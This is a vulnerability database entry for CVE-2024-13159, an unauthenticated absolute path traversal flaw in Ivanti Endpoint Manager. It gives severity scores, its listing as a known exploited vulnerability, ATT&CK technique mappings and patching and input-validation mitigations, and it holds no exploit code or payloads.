CVE-2024-13159
Published: 14 January 2025
Summary
CVE-2024-13159 is a critical-severity Absolute Path Traversal (CWE-36) vulnerability in Ivanti Endpoint Manager. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Data from Local System (T1005); ranked in the top 0.1% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
CVE-2024-13159 is an absolute path traversal vulnerability, tracked under CWE-36, that affects Ivanti Endpoint Manager (EPM) prior to the January 2025 Security Update for both the 2024 release and the 2022 SU6 release. The flaw permits remote, unauthenticated access to arbitrary files on the affected system, resulting in disclosure of sensitive information. It carries a CVSS 3.1 base score of 9.8, reflecting network attack vector, low complexity, and no required privileges or user interaction.
A remote attacker with no authentication can send crafted requests that traverse the filesystem and retrieve protected files. Successful exploitation yields sensitive data that may include credentials or configuration details, enabling further compromise of the EPM deployment and potentially broader network access.
Ivanti’s January 2025 Security Advisory directs customers to apply the corresponding updates for EPM 2024 and EPM 2022 SU6. The vulnerability appears in CISA’s Known Exploited Vulnerabilities catalog, confirming in-the-wild exploitation, while its EPSS score remains elevated near 0.94.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-51385
Vulnerability details
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.
- CWE(s)
- KEV Date Added
- 10 March 2025
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Absolute path traversal enables remote reading of local files for data collection (T1005) and file/directory discovery (T1083). UNC path coercion facilitates forced authentication (T1187). Unauthenticated remote vulnerability in public-facing application (T1190).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Requires timely identification, reporting, and correction of the path traversal flaw in Ivanti EPM via vendor-provided patches in the January 2025 security updates.
Directly prevents absolute path traversal exploits by enforcing validation of externally provided file path inputs to restrict access to intended directories.
Boundary protection with web application firewalls or inspection proxies blocks remote unauthenticated path traversal payloads targeting vulnerable Ivanti EPM endpoints.